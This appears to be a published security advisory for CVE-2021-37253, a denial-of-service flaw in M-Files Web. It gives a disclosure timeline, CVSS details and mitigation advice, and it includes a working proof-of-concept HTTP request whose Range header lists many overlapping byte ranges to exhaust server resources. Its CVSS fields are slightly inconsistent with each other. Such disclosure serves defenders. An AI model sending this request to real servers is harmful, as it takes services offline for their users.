M-Files Web Denial Of Service

`I. SUMMARY  
=============================================================================================================================================================  
Title: M-Files Web Improper Range Header Processing Denial of Services  
(DoS) Vulnerability  
Product: M-Files Web version before 20.10.9524.1, M-Files Web version  
before 20.10.9445.0  
Vulnerability Type(s): Denial of Services (DoS)  
Credit by/Researcher: Murat Aydemir (Turkey)  
Contact: https://twitter.com/mrtydmr75  
Github: https://github.com/murataydemir  
=============================================================================================================================================================  
  
II. CVE REFERENCE, CVSS SCORES & VULNERABILITY TYPES  
=============================================================================================================================================================  
CVE Number: CVE-2021-37253  
CVSSv3 Score: 4.3  
CVSSv3 Vector: CVSS:4.3 (AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:L)  
Severity: Medium  
Confidentiality Impact: None (There is no impact to the confidentiality of  
the system)  
Integrity Impact: None (There is no impact to the integrity of the system)  
Availability Impact: Complete (There is a total shutdown of the affected  
resource. The attacker can render the resource completely unavailable)  
Access Complexity: Low (Specialized access conditions or extenuating  
circumstances do not exist. Very little knowledge or skill is required to  
exploit)  
Authentication: Not required (Authentication is not required to exploit the  
vulnerability)  
Gained Access: None  
Vulnerability Type(s): Denial of Services (DoS)  
CWE ID: CWE-399 Resource Management Errors (  
https://cwe.mitre.org/data/definitions/399.html)  
=============================================================================================================================================================  
  
III. TIMELINE  
=============================================================================================================================================================  
Contact to Vendor: the 24th of August, 2020  
Vendor (M-Files) Reply: the 3rd of November, 2020 (rejected vulnerability)  
Contact to Vendor: the 4th of November, 2020 (provide additional  
informations & some of proof of concepts)  
Vendor (M-Files) Reply: the 6th of November, 2020 (accepted vulnerability  
and ask time to fix)  
Vendor (M-Files) Reply: the 4th of August, 2021 (inform me that "we're  
accepting this vulnerability but we'll not give an effort to fix that and  
also will not apply any CVE for this vuln.")  
Contact to MITRE: the 4th of August, 2021 (contacted MITRE and applied for  
CVE. MITRE has reserved CVE to me for this vulnerability)  
=============================================================================================================================================================  
  
IV. DESCRIPTION & MITIGATION  
=============================================================================================================================================================  
M-Files Web version before 20.10.9524.1 and M-Files Web version before  
20.10.9445.0 contain an Improper Range Header Processing Vulnerability. A  
remote unauthenticated attacker may send crafted requests with overlapping  
ranges (via HTTP requests with a specially-crafted Range or Request-Range  
headers) to cause the web application to compress each of the requested  
bytes, resulting in a crash due to excessive memory and CPU consumption and  
preventing users from accessing the system.  
  
Even if this vulnerability (CVE-2021-37253) has been verified and accepted  
by the Vendor (M-Files), their security team also contacted me and informed  
me that no effort will be given to fixing this vulnerability. Thus, there  
is no active patch, update or mitigation plan for CVE-2021-37253  
vulnerability. These are not exactly fix the problem (maybe just  
remediation), however I strongly recommend you to restrict IP addresses for  
web applications which incoming requests/clients or reconfigure the web  
server for "Byte-range Request Segment Size" as soon as possible.  
=============================================================================================================================================================  
  
V. PROOF OF CONCEPT (POC) FOR CVE-2021-37253  
=============================================================================================================================================================  
This is easy to detect and exploit for this vulnerability. Just find a  
static content (such as .png, .jpg, .jpeg, .js, .css and so on) and make a  
request as follows.  
  
GET /Icons/Standard/Listing/VaultMounting.png HTTP/1.1  
Host: <host>  
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:79.0)  
Gecko/20100101 Firefox/79.0  
Accept: application/json, text/javascript, */*; q=0.01  
Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3  
Connection: close  
Range:  
bytes=0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-  
  
Note: this issue is valid and easly reproducable for all static assests  
(which has .png, .jpg, .jpeg, .js, .css, .gif extensions and so on)  
=============================================================================================================================================================  
  
VI. REFERENCE(S)  
=============================================================================================================================================================  
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-37253  
https://nvd.nist.gov/vuln/detail/CVE-2021-37253  
=============================================================================================================================================================  
  
  
`